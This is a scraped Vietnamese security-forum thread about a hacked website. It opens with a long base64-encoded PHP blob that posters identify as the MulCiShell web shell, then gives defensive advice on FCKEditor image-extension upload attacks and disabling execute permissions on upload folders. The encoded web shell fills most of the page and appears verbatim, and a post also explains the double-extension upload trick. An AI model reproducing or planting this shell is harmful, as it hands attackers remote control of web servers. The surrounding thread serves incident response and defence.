Enpq0U3U6WXkHYdTcuoSuZ/z/Vs0qmhkFvOQ7ZXc
OquyodfAeVnJGfNMynhdKKYfTnM1xW/Wxszlr6e5
t+mtGanRlQiY53JrbjYx9KvZeLJXy6n/TVtJhz0v
quBd+r5MQ8ZQq+E1P8WqRZDfWpEJW455ixqB4/ay
fKu+mTaWCeW5jHnLbiy2WCD0KP58W8+3pJKczTCR
BjSxY5BJFI2TZBH/pFL0RN5Y3GVpj8UqzBSrLE/5
cJix98OAAw+4s+oP4QwJ2yAzYQF7CxFzOvSrWan8
CNyO+lN6acNWyOiFEqgXosxYL+lU7fDMI2ZCh4hP
7Bf/0q+jmgUBYCyIaMC/jIJ5DJ9Qz+0enuX4OJyO
iIFPOjRYA2CrkxCkfeQaDaZSrVr6rVhaFCggXWTd
jEosyqa2mU8wcHcdX6lcyLmVbuWT9WbVX43hpA79
dOnpQg0jYkzAa3USnH+a0cFFZEfKxnypT4CkC3xR
NI1JMbPY5FFrtxli8BnM6FZhA1WgaMiS2z19eiFK
K0gAbcvVUb8JJ9r+LFST6oQc4vQplTLNf38cpG4F
gc23/hZgjYMlve3RDOUdcD6BCxRfgDKVzYdBlRrn
dyM+rLhY+v9n7ZyzdpNNW/nwDWEQf6TnzI9M56Uf
mc6bj5/Psxn7GakV/6fxtdxR0D4Cj1x6F81BkoQ9
GVFhPMwNC7MzKZKR7P+Cnu8pWGFvB446d/WC8Z6P
UgFfozmTv8VDeuWFuLiK8nGd7di1kfIL+gRySGEZ
eCZdUy1s0G3h9QrLGi/FFDqFDXbfe3I5ds28sMEu
/styk7Xd7JYsfQjCsJvB7DzLxjFP+ImDUNRXoQw2
uJrbeJJFmYbYXka4uyFrro094cPDmQZhG/aHz56l
VIJdfup6vKkdzVQZKj6mh52MLtx7B3RFRwy2I+te
8td4ptWPwlBVJUd+ZZoArkxVFc/6yOqyKpmKppvy
zS3tS4oqwpuhu7qyqUfZ9UUtgXjdmkEcY2o8+TZ0
Kk3nIGmG3+kPH76N07eIW6GgYlSB/TL9WBvLZvez
6qyn8WwiDGbT5Y7xbHIsqDPgxrIJI+qauXwU6kie
+AwGRjNqTrOdoGMwbfp1nz6pE6Z7kswDg41tk43h
qTqjawrqubtOvRCg2XT/M6qTJ4axFgOnxeb4rIzV
j9uDNz4f0Q86tK7rnPvEiJQk5ARyXyF9tGRxzD7g
2wo4eot0I/MH+uHziy8Y/2KmZgRf2hOkzoZHTNMb
7viu6/VESbepuQPRYbl5m1VrouhGqcjLK8mdQkam
LCWLfoY8ze5XrM98HaZVWULz2UJnIes0CtHUB5vX
Ww26BpooGxhC3YRzkvdlhmrNbCV99S7y4jrjSlmG
oFgw3TmmKOMnK3FYA6QigGYtLaAaLjsqBtu2/LkT
drt2T22oLnwe9ow3pc420g8/4uC3vMTpNGDahA7F
mVfKFaFljz4furealvwzQmEkAPvonxwaIw0huk0f
tJ484TDgK5PQ9yBIGAwmDvUYavq9pXElYFPQaUJ0
DLfpMI+sZoN5AS4Ux6jPWorCPtetolsJfC0YPlKP
pitjQo5SEWZe0YtaI6WbIi/3ZVEJAMUYBvE1xQb6
tZGdQ2dJt8lvrpn3L9JlDfobjaU4PmkGdV1vnDt/
8/7autjaPto7t/bP3h9bqu3PYoS36qoP1G/QCOtp
VTHkpGfNxPMIlyHP3GY9qzs4omSkKkaUQKizx3gf
wqdocieKNtppaBq0xE6TGiO62htjtP2uM5w+CebY
tGYJ2hNvKP2yrFk7UHqBhxdW6wYLULPxI9J6h7nd
ioErcY2TciNTPuc0DYx5Y01Nd22vT4lA4RlCAEow
KUAYnUMQ8Cb/DklwYah8d8Jg0O2l5cCg258hA9hT
ULNmp1jpc6ZAQHSYsoDpPlijKSHQ2tFmsN7Tzvuj
y+OTdFdlav1zVRMDLWds/rNGf0gEiI6eoXQSnRU2
xC9TW9Fy5p71E9o1aDEvaJyF9Gb+rhlvdJye/nwC
wsRmnD9r9lMhMUnZXMmY/WJnObafVDKDW30KG9ZP
yA22RMpmaRJvZLrHZV9qptnc8r3AzThMAvpi+94b
2+XxR9XY45bpCbZ3tLdzATvxNMvTL4Dv1rp+s3e2
x7Oo61uBoPvbgpoSRuvGemz2LyvceSNuDG3gz4V8
Kp83qMylT56kg8vR8eeuvpG/L6pHo+RDYHcl6gN1
n6wtNAzdi+aZETl3ebq7dbGXPfLzvQsrp0eIGKFd
cSTsigLe/IjMiqlnGqFw3Sz4Ql7PZZ2X6zkC8HN+
hCjlMMJHQfaqBQScWakka33XhwgVxilo1S2NhnJz
AwjRuYM1MM10PvZ6IfH3oI/qW/epHlcrHQJ4DkEo
CVHYOAgpjDeJG+7PlpsZp2jCZKHk+4xF1/WC7IBz
PyK3UkN4RnDUdRo8u69LEmRYbNndXpxLWDo9D/I8
df41TIKSiizCWsqat6wLnD4KDLKt4q/PhX2GWQEQ
brP+LtniNvq+52Ru9rFbI4pLF+doV8xRBTnM0+7Y
PM33Qx92AvoA893bNeOKLCsz9TYSh+8zKyrFe6rZ
ghkDwwhpMdW9GoW60gqQjJ+waEyZCHyfOWmbqYVJ
MIr4vdjj0ZVg53hIXwvGG33zTraJcy11JTmlmtKD
K3HG2gXGApn9KLYSXKWul5yFQxmb1bjkPM3JFPZ6
qcJ8m5MC+num/Pgh6feMkaBeK2x8Zvin3Q9AwneG
qa5/QmeTU4GWgp+TLflMqcUlDrSeNZWx0zRLsP1B
fxB3hDwqYTkpfYopOpC9DvIpmx2Zs0mi62/SbBxz
fm2Qf53v6OkCvjzTYYbRo2Xe0eHx4QXPim9L1uJy
lflSpQIA/2wP1VTTInQFtWrgH1hpQfY2YVJq6BLR
sqpatCwpY30pY9PhQNhzBOhJycNyOx07ikXHGFRL
PDuQW3uSCjiiWvjBOcSXXy6Mq7T48o7xLINa/LnV
ID/azTOQIWTvUJZN3uOYNEmiiWyrHG3nmeuFqUw+
thpG3n0dVjC8oa0VewF8JCNA9DDq+XiZ51oZ3P3K
nA0ZHuYnzsQKw3GdoCxsnMLffjiIx5GI8ZBSh3PJ
3BuLL1eKfxVTASyIDdRJPSSZR2E9rrf1lywGcR0Q
rfeYLf1NPvnOLZPSN3rsYiCmjt8NnMM2Ju1i1rht
TF1ktP7jnsWP0K0JzZOxVuXdQbdPd87qufF3utH0
JXWAWDLrMW8Z9021Vc5qDP+gTgY2Gs3RqnU8CBzx
Amq1vPhLdtOqcbxQ8lO6M67ZYI1kKdFUD1xicIzh
YcCoLGMyymM6f98dz+lM+YKoSKknAI/c6RvPVfMt
dqqx9HFGAKSdR8YODKq7MRHI9y1+l7sz/16yfs+V
LF1PofegR5Fl+opUTVaR5U2sqvPH4cn53tmFdXhy
8d76XRvn75ZcZa2rraNLoKpSQaSO/jwCzw8cA/78
H8H8hsqYsPPYPVJafcwamsAyGuemFMmZzKLzimq4
mFZsTWWUrHqTuSRjgFPY5feixKDGKNaf40HCnpp3
5Ocg5c//yaXdolIsSk6epMOt55REK+cau5fHp2Vc
kUx38KyiGh+kK4ZN9M5sOHhNgq0FYgHcCWGh7SUv
8IwOu6t+P/DZilgJncRLXsCi6dldYiz0TUlXC7xe
Gz0hcmVxwVRis8jqjPXk+rF6zc5OEpCoXUhfI+87
9pSQHOEa75gRULVNyHjwk1RMrfM/AnGW/48tzU/H
XROUdiEdnutndG3ywDzhlS9xvpioXvsLtGtCufYo
xZpSqnG9Jp208MZcPs7UaMXitMVVVbrCKb5dtbKU
Vhm6qTilm5qtk2LMo/uqcFLqxk/NqcaQMf8N0Mvg
yDIxaHYJmcRtBbrQzTx4L+RS259MK8Wf2bYKjbCw
ZeWxeO7HNijjpgwGMqbcje8CGAvdIQvdCRYiqwh8
sxtTBkRQsq6XelEDNAo7wu/c8nB3+3tuLa2vyCpV
MrSSsoRakRS+YKgI4/2YceVesLgG5H2GaUWBqawi
mnEjA1Cj3CRQzRlhHrbSikluL9EVjGxWmBrGTP0i
K5jWL2ZqF79nOiIyo35WeE62IP4H5Xva50DbWPKZ
tHv2/tTa3YLTyda5NL6Re8ntfLiV+0+jLj1R0vS8
noUJfePRrWytLhRT3iRGW6rq/Bvp6WOeorXmFecc
PLOymTV/bOhJRkvpgWdtDGX0WDOO0tTXa1Q8u3Gm
1nlZc2ubyM0ZPnH81ami9eyZlXolQmVmOFnr0wFv
ueCE+Gv8rMfsFjtne2hr1vie4OPgaaaJ88ROBvGq
pXG5UVKECHw6jcAiQuCENnTfpOl0q6RcpsXlcxYs
e3fbYu/TZpDXS8bJa/orzU9hzXfjVlsgs3L/o1Se
cmtd+ozoD9VlcQRpafAcRzXVWPAU9/vF3vHp+7Ot
s0+/Wxd7Hy+sk/fw/8ujo+I4vwjBkG7mMfySTGhj
HlZ5OoNXWNsT2SVLGuhxxuR14JTRUcT8ZGfDupG+
pi5lmPzUy6hn5EysqQfTHKusMjkXbz41IhPzdw4n
X6rPlG5ad/xSY/r5UBEVazPfHLRaXlRv4VVqCuen
7vRpUat+7FQ7Xm/8WMv6F2faHzjU6hE0COJyYU2M
bux4jl2wIy/rd80IEM8DE36fREoXjpUp1OJGhgcr
MkOBiPgf/NVPa8rLnE+zIxZlvQY6EbQ4DRiSfNOg
+XByQGV6HxSD+yM/+r025ywjzGNmzAxiVofRCu06
MhzWhHz9BiYNEN0ThKCZRIfJQxJsbK4IdO1qgkKg
lXUTgyDB2How+kffTiFQxNGWCYOZN8bUrZK2FjhP
W2OFscmMkbyoYiQvV/W7ogrFWTbTzcmTO/UedzYU
M5xNLB0B8XwIELYeo647Z101cwrqCqhWN1OlkMFc
+sIxFllybPXgsZoxqhEPR6nPNuMlwxzFUaxUxBOS
SCFWR2gkpj9jeC7eMZxU7Gzv4vLs5OJs6+R8f+9M
vGfI1HvhIKlnPFVISRwFIm0uLpPP2GdZ40WPU/lo
otDC11/HcYnhL4GsKv6SIUxEgPjpkhojZ2Y0LcLL
YbYpo0TZkpL1MfNjGnsJgMSWHmwRWsPVWD+J6yuu
0aCSWT+P/cx5nQJ/+gQfj8k7ccfWH7E45rOpKqKG
jaMfX27VdzdZBMjQ7c6LIT4k3v+E5k1NicSMabrI
XmL/yJr5Ew4Nf+WZYdKRAVNVsKsncxwVYL7RpppO
CsjI6UPCWi6rsaP3W7t0DrUOT/ARZ+tLjrfItJDQ
4JccU3SyDsf6y011C9ZuFk4wyY01J09Iad8NvEq3
XiumtzkRHC59jy9Wllgun2oNUU1ddSguDYbDLCs3
uzaYb6GHNRShixdpB2YWa4hrCU2fRNRoTcSVyYsz
HfTmDpNF06Zvw4ZosaCiKS7oIQOLFmNxL4oz4w9u
U641iDFat4pSmM4RMryY2cjEGP9sdpk7NBFqn4NV
YDEUfyBSsS4Hsm9z8RgP2hIvmtsW1YQfrXD8+qmR
YPwrb+ZQyuUK+9+PD0lbaKeOaCqxcc0sZpNbiNy/
g9w7FAQ7nGNfvrgM+/I1tSeMFQ5z5fHYkeVcBcdE
D/6wRdESBwFM/7u4S9uZ/L3cheHn6CGIv2+qpJb6
R/CWIYoMXkJ/EVpw+FrzmSKi4EAwh4U3Z29Z3M5s
+OcQ+HkP9ykA061SrWKU7ARf+kMJF0Z2NJp9sQxn
X/paKV+7Gd9dPK4t/eQjlw1xhnwMmcXqPZXG2rZn
LvpqvoT6AcsIym/occdplCaMB20QZN1BkPh9O0qo
4xeI1AlX87gMCNnjjht//fIpH0mkHiYtl8e7y9YO
K6CCJL7ZqpmJqUpv7LizOtkWL14InRpyiNrXagg8
yKgK0/uQL1LO34l6SjN7MbnahsOSB9PJOreDZBwr
x/ssw/lxzPB31dlMwMamlqWH2umt+Hrhl1+3sibQ
tPGKF+3nx2m3NT94UJjgeyRQUG0aDSjItLWNUxHf
8XPUNez9i9Px9FRtDOI0dwAn9R47G8Ljo0epJ99Z
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
LGw2PDwrBxjQF/dTrzfWX/8/
'))); ?>
|
|
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
30/06/2011 09:03:26 (+0700) | #8 | 242428 |
![[Avatar]](/hvaonline/images/avatar/a418e120ebf7850cdcc4659638435b15.jpg "[Avatar]")
|
lovestormknx
Member
|
|
0 |
|
|
Joined: 31/12/2006 16:39:16
Messages: 44
Offline
|
|
| Đó là code của cái MulCiShell v0.2, đã bị encode. Cái này mà echo trên máy có Kaspersky là nó "chửi" liền! |
|
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
01/07/2011 00:58:45 (+0700) | #9 | 242512 |
|
thuypv
Member
|
|
0 |
|
|
Joined: 11/06/2008 12:25:57
Messages: 64
Offline
|
|
lovestormknx wrote:
Đó là code của cái MulCiShell v0.2, đã bị encode. Cái này mà echo trên máy có Kaspersky là nó "chửi" liền!
Em tiếp xúc 1 vài con shell rồi, kasper và AVG đều không phát hiện được mới đau sờ cau
Đúng là Nokida bị dính lỗ hổng FCKEditor rồi, cái này mình cũng gặp rồi, đó là nó dùng 1 con shell dạng ảnh
Kiểu: xxx.asp.gif
Loại này, file upload mà kiểm tra đuôi file là dạng ảnh rồi cho upload lên thì vẫn lên server bình thường, nó dễ dàng đọc được đường dẫn ảnh, rồi sử dụng con shell này ngon ơ, thằng FCKEditor khi config file để chỉ file dạng ảnh thì vẫn lên ầm ầm, vì cuối file nó là .gif mà
Mình có 1 cách cho bạn để tránh loại shell dạng này
TH1: Nếu là lệnh upload file của bạn lập trình(không phải editor), khi đưa file lên bạn đổi hết tên nó thành: "ngay_thang_nam_gio_phutgiayphamtramgiay.đuôi file"
Tránh trường hợp để im tên như cũ, hoặc 1 đoạn nào đó + tên cũ
TH2: Nếu dùng các loại Editor, thì dùng cái 1 chắc hơi khó
Nếu bạn đang quản lý server là windows, mình có cách này: đó là thư mục mà bạn chứa file upload lên, bạn không cho chạy script ở trong thư mục đó
Tức là bạn vào IIS, sau đó chọn cái website của mình, tìm đến thư mục upload của mình, sau đó ấn chuột phải chọn Properties -> Trong tab Directory bạn để ý mục: Execute permissions bạn chọn mình là none, tức là thư mục này đếch cho execute cái code nào hết kể cả html
Trong các quyền bạn chọn cho mình quyền Read và log visits thôi, còn lại bỏ hết
Mình nghĩ chống Shell bằng cách bỏ Execute permissions là cách hay nhất, vì họ đã đột nhập vào được hosting của bạn, mình nghĩ họ đã upload 1 vài file linh tinh rồi đặt trong các thư mục của bạn rồi, hoặc sửa cấu trúc 1 số file, vì thế nên upload lại code mới, đồng thời phần quyền ghi file, sửa file thật chặt, các thư mục nào ko cần excute thì bạn vào iis chỉnh execute permission thành none hết cho mình
Chúc bạn thành công |
|
|
|
|
| [Question] Xin tư vấn về Website bị hack và cách phòng chống? |
14/07/2011 21:21:00 (+0700) | #10 | 243540 |
Xã Hội Đen
Member
|
|
0 |
|
|
Joined: 13/07/2011 20:27:11
Messages: 1
Offline
|
|
Cảm ơn, mấy bác, em học tiếp thu  |
|
|
| Users currently in here |
|
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận bảo mật
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[ICQ]](/hvaonline/templates/viet/images/icon_icq_add.gif "[ICQ]"){kind=icon}
![[WWW]](/hvaonline/templates/viet/images/icon_www.gif "[www]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")